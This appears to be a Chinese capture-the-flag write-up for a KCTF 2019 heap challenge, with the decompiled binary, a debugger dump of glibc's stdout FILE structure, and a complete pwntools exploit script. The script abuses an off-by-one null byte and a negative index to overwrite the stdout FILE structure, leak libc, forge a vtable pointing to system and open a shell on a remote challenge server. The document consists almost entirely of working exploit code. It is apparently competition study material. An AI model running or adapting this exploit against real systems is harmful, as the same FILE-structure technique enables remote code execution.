个人学习两年半的个人安全研究者,擅长pwn,希望和各位大佬多多交流。
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
int v3;
f_set_hook_E4C();
puts("Welcome kctf 2019,you pwn like hsy!");
while ( 1 )
{
while ( 1 )
{
f_menu_DDD();
v3 = f_get_char_num_C81();
if ( v3 != 2 )
break;
f_delete_FC0();
}
if ( v3 > 2 )
{
if ( v3 == 3 )
{
f_edit_1084();
}
else
{
if ( v3 == 4 )
exit(0);
LABEL_13:
puts("Invalid choice");
}
}
else
{
if ( v3 != 1 )
goto LABEL_13;
f_add_EC3();
}
}
}
unsigned __int64 f_edit_1084()
{
int v1;
unsigned __int64 v2;
v2 = __readfsqword(0x28u);
printf("Input idx : ");
v1 = f_get_char_num_C81();
if ( !LODWORD(g_heap_arr_202080[2 * v1]) )
exit(1);
printf("Input text : ");
sub_D22((char *)g_heap_arr_202080[2 * v1 + 1], g_heap_arr_202080[2 * v1]);
return __readfsqword(0x28u) ^ v2;
}
char *__fastcall sub_D22(char *a1, int a2)
{
char *result;
int i;
char s[8];
unsigned __int64 v5;
v5 = __readfsqword(0x28u);
memset(s, 0, 8uLL);
for ( i = 0; i < a2; ++i )
{
if ( read(0, s, 1uLL) <= 0 )
exit(1);
if ( s[0] == 0xA )
break;
a1[i] = s[0];
}
result = (char *)(unsigned int)i;
if ( i == a2 )
{
result = &a1[i];
*result = 0;
}
return result;
}
pwndbg> p *(struct _IO_FILE_plus *) stdout
$1 = {
file = {
_flags = 0xfbad2887,
_IO_read_ptr = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_read_end = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_read_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_write_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_write_ptr = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_write_end = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_buf_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "",
_IO_buf_end = 0x7ffff7dd26a4 <_IO_2_1_stdout_+132> "",
_IO_save_base = 0x0,
_IO_backup_base = 0x0,
_IO_save_end = 0x0,
_markers = 0x0,
_chain = 0x7ffff7dd18e0 <_IO_2_1_stdin_>,
_fileno = 0x1,
_flags2 = 0x0,
_old_offset = 0xffffffffffffffff,
_cur_column = 0x0,
_vtable_offset = 0x0,
_shortbuf = "",
_lock = 0x7ffff7dd3780 <_IO_stdfile_1_lock>,
_offset = 0xffffffffffffffff,
_codecvt = 0x0,
_wide_data = 0x7ffff7dd17a0 <_IO_wide_data_1>,
_freeres_list = 0x0,
_freeres_buf = 0x0,
__pad5 = 0x0,
_mode = 0xffffffff,
_unused2 = '\000' <repeats 19 times>
},
vtable = 0x7ffff7dd06e0<_IO_file_jumps>
}
from pwn import *
import os
context.log_level = 'debug'
local=False
if local:
env={"LD_PRELOAD":os.path.join(os.getcwd(),"/libc-2.23.so")}
p = process("./pwn", env=env)
else:
p = remote("154.8.174.214", 10001)
raw_input("Pause~\n")
offset_system = 0x0000000000045390
offset_IO_list_all = 0x00000000003C5520
base_addr = 0
heap_addr = {}
def new_heap(len):
p.recvuntil(">>")
p.sendline("1")
p.recvuntil("Input size : ")
p.sendline(str(len))
print 'create new heap:' , len
p.recvuntil("heap ")
num_str = p.recvuntil(" ", drop = True)
print num_str
p.recvuntil("0x")
heap = p.recvuntil("\n", drop = True)
print heap
heap_addr[int(num_str)] = int(heap, 16)
def set_heap(idx,cont):
p.sendline("3")
p.recvuntil("Input idx : ")
p.sendline(str(idx))
p.recvuntil("Input text : ")
p.send(cont)
print 'set text ' , idx,',cont = ',cont
def del_heap(idx):
print 'del_heap ' , idx
p.recvuntil(">>")
p.sendline("2")
p.recvuntil("Input idx : ")
p.sendline(str(idx))
new_heap(0xf8)
new_heap(0xf8)
new_heap(0xf8)
new_heap(0xf8)
new_heap(0xf8)
print("Get All Addr:")
print(heap_addr)
payload = p64(0) + p64(0xf1) + p64(heap_addr[1]) + p64(heap_addr[1]) + '\x0a'
set_heap(0, payload)
payload = p64(0x110) + p64(0xf1) + p64(heap_addr[0]) + p64(heap_addr[0]) + 'a' * 0xd0 + p64(0xf0)
set_heap(1, payload)
del_heap(2)
payload = p64(0xfbad8800)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[1]+0x10)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[1]+0x10)
payload += p64(heap_addr[1]+0x10+8)
payload += p64(heap_addr[1]+0x10+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8+1)
set_heap(-6, payload)
p.sendline('q')
main_arena = u64(p.recv(8))-88
libc_base = main_arena-0x3c4b20
libc_system = libc_base+offset_system
IO_list_all = libc_base+offset_IO_list_all
print('main_arena: 0x%08x\nlibc_base: 0x%08x\nlibc_system: 0x%08x\nIO_list_all: 0x%08x' %
(main_arena, libc_base, libc_system, IO_list_all))
raw_input("Pause~\n")
payload = p64(0xfbad2887)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[0]+8+1)
set_heap(-6, payload)
p.sendline('q')
payload = p64(libc_system) + p64(libc_system) + p64(libc_system) + p64(libc_system) + p64(libc_system) + p64(libc_system) + p64(libc_system) + p64(libc_system) + '\x0a'
set_heap(4, payload)
payload = '/bin/sh\x00'
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[1]+0x10)
payload += p64(heap_addr[0]+8)
payload += p64(heap_addr[1])
payload += p64(heap_addr[1]+0x10)
payload += p64(heap_addr[1]+0x10+8)
payload += p64(heap_addr[1]+0x10)
payload += p64(heap_addr[1]+0x10+8)
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(heap_addr[0])
payload += p64(1)
payload += p64(0xffffffffffffffff)
payload += p64(0)
payload += p64(heap_addr[0])
payload += p64(0xffffffffffffffff)
payload += p64(0)
payload += p64(heap_addr[0])
payload += p64(0)
payload += p64(0)
payload += p64(0)
payload += p64(0x0000000000000000)
payload += p64(0)
payload += p64(0)
payload += p64(heap_addr[4])
set_heap(-6, payload)
raw_input("Success, press Enter~\n")
p.interactive()
p.close()
往期赛题
* 看雪.纽盾 KCTF 2019 Q3 | 第一题点评及解题思路
合作伙伴